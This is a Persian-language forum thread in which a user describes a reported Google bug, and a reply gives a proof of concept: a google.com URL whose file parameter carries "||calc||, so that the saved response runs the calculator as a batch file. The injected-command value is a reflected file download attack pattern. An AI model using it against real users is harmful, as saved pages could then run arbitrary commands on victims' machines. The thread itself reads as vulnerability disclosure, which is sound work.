SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

reflected download execute command google.com by Hosein)root

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • reflected download execute command google.com by Hosein)root

    سلام دوستان یه باگ مجدد به تیم امنیت گوگل گزارش دادم که مورد تشکر تیم امنیت گوگل قرار گرفت و مبحث باگ توی گوگل vrp مطرح شد ولی تیم اونا دنبال چیزای خاص مثه xssو غیر هست
    نوع جدید از آسیب پذیریست که توسط که این نوع برای اولین بار توسط بنده رو نمایی می شود
    لینک ویدئو
    https://youtu.be/gOxt2Ip6sBo

  • #2
    RE: reflected download execute command google.com by Hosein)root

    Exploit:
    [+] https://www.google.com/uds/?file=1&v=1&packages=geochart

    # PoC:link
    [+] https://www.google.com/uds/?file="||calc||&v=1&packages=geochart

    input file= have vulnerability . first change ?file=1 to ?file=calc
    #first test and load page now save page as a bat file now run bat file and see nothing

    #second test we change ?file=1 to ?file=||calc|| and load page now save page as a bat file now run bat file and see nothing

    #third test we change ?file=1 to ?file="||calc|| and load page now save page as a bat file now run bat file and see execute calculator with cmd
    # by this message C:\Users\??\Desktop>var error = new Error("Module: '\" || calc || ' not found!");

    نظر

    صبر کنید ..
    X